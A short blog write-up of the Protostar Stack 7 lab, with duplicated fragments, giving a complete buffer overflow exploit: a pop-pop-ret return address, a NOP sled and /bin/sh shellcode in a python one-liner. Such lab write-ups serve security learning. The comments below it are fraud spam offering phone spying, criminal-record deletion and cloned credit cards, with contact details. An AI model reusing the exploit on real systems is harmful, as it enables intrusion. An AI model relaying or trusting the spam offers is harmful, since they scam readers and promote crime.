Exploit Exercises - Protostar Stack 7
In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.
Comments
I urge you to get in touch with the best people for the job, i have confirm the service when i need to spy on my spouse phone. They are good at Phone Cloning and Bitcoin/binary minning and any other hack job.
Thanks guys for the team work HACKINTECHNOLOGYATGMAILDOTCOM
+12132951376(WHATSAPP)
WhatsApp:+1(305) 330-3282
-hack into any kind of phone
_Increase Credit Scores
_western union, bitcoin and money gram hacking
_criminal records deletion_BLANK ATM/CREDIT CARDS
_Hacking of phones(that of your spouse, boss, friends, and see whatever is being discussed behind your back)
_Security system hacking...and so much more. Contact THEM now and get whatever you want at
Prices for clone cards with their balance that we offer:
* Gold VISA- € 450 ----> Balance € 250,000 Daily withdrawal of € 1,500, validity 24 months
* Gold Mastercard- € 500 --- -> Balance € 325,000 Daily withdrawal of € 1,800, validity 36 months
* Platinum Visa - € 550 ----> Balance € 480,000 Daily withdrawal of € 2,000, validity 24 months
* Platinum Mastercard - € 600 ----> Balance € 620,000 Daily withdrawal of € 2,500, validity 36 months
* Infinity Visa - € 750 ----> Balance € 750,000 Daily withdrawal of € 3,000, validity 24 months
* Infinity Mastercard - 850 € ----> Balance 850,000 € Daily withdrawal of 3500 €, validity 36 months
Once payment has been made 12h to 48h in Europe and 12h to 72H worldwide
After your order will be available, at the delivery address given.
Shipping is by courier with parcel tracking within 2hrs after payment
If you order regularly with us, we guarantee that you will not miss anything in the near future.
Email:Creditcards.atm@gmail.com
WhatsApp:+1(305) 330-3282
✔✔✔ ✔©®™